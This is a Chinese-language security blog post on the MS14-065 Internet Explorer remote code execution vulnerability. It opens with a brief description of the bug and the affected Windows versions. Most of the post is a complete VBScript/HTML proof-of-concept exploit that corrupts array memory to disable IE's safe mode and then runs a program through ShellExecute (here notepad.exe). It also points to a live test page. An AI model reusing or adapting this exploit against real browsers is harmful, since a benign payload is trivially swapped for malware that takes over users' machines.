关注我们
QRcode 邮件联系 QRcode

IE浏览器远程代码执行漏洞(MS14-065)

 feng  754 ℃  0条点评

MS14-065 包含了一序列的IE漏洞,其中最严重的在用户在查看特定网页时 允许远程执行代码。成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。 影响系统:2003(SP2)、Vista_32/64(SP2)、Win7_32/64(SP1)、Win8_32/64、Win8.1_32/64 目前官方已经推送了补丁。

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray
Begin()
function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
  if(instr(info,"Win64")>0)   then
     exit   function
  end if
  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
     exit   function
  end if
  win9x=0
  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
     if(intVersion<4) then
         document.write(" IE")
         document.write(intVersion)
         runshellcode()
     else
          setnotsafemode()
     end if
  end if
end function
function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function
function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)
       Create=True
       Exit For
    End If
  Next
end function
sub testaa()
end sub
function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314
     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)
     redim  Preserve aa(a0)
end function
function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
            j=0
            redim  Preserve aa(a2)
            aa(a1+2)(i+&h11c+k)=ab(4)
            redim  Preserve aa(a0)
            j=0
            j=readmemo(i+&h120+k)
            Exit for
        end if
    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function
function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
    redim Preserve aa(a0)
    redim ab(a0)
    redim Preserve aa(a2)
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then
                 If(IsObject(aa(a1)) = False ) Then
                   type1=VarType(aa(a1))
                 end if
              end if
           else
             redim  Preserve aa(a0)
             exit  function
           end if
        else
           if(vartype(aa(a1-1))<>0)  Then
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if
            end if
        end if
    end if
    If(type1=&h2f66) Then
          Over=True
    End If
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If
    redim  Preserve aa(a0)
end function
function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2)
    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    ReadMemo=lenb(aa(a1))
    ab(0)=0
    redim  Preserve aa(a0)
end function
</script>
</body>
</html>

测试地址: http://www.afeng.org/ie.htm 请使用ie浏览器打开

OpenSSH SFTP 远程溢出漏洞
Linux关闭ssh远程连接时Screen保持任务会话
DNS服务器软件BIND 9 TKEY查询拒绝服务漏洞CVE-2015-5477 pocDNS服务器软件BIND 9 TKEY查询拒绝服务漏洞CVE-2015-5477 pocElasticsearch Groovy漏洞利用工具java版Elasticsearch Groovy漏洞利用工具java版Elasticsearch Groovy任意命令执行漏洞EXPElasticsearch Groovy任意命令执行漏洞EXPOpenSSH SFTP 远程溢出漏洞OpenSSH SFTP 远程溢出漏洞

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码